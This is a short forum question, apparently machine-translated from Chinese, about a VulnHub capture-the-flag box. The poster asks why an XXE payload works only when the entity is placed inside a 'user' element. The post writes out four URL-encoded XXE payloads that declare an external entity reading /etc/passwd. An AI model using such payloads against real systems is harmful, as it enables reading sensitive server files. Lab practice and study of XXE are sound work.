我正在这样做捕获标志:https ://blog.mzfr.me/vulnhub-writeups/2019-08-24-scare
我正在测试 xxe 的有效负载,但它们都不起作用,即使在对某些字符进行 url 编码之后也是如此
在我在这里发布的演练中,我看到他的有效载荷与我使用的有效载荷太相似了
我发现他对查询进行了标记,第二个标记必须是“用户”,否则将无法正常工作
这是有效的payload
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+root+[<!ENTITY+test+SYSTEM+'file%3a///etc/passwd'>]><root><user>%26test%3b</user></root>
以下是一些我使用过但没用的有效载荷
%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+"file%3a///etc/passwd">]><xxe>%26xmli%3b</xxe>
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+"file%3a///etc/passwd">]><xxe><e>%26xmli%3b</e></xxe>
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+'file%3a///etc/passwd'>]><xxe><e>%26xmli%3b</e></xxe>
我的问题是:为什么它必须是标签“用户”,我怎么知道我需要使用它?为什么要打标签?
提前谢谢你,对不起我的英语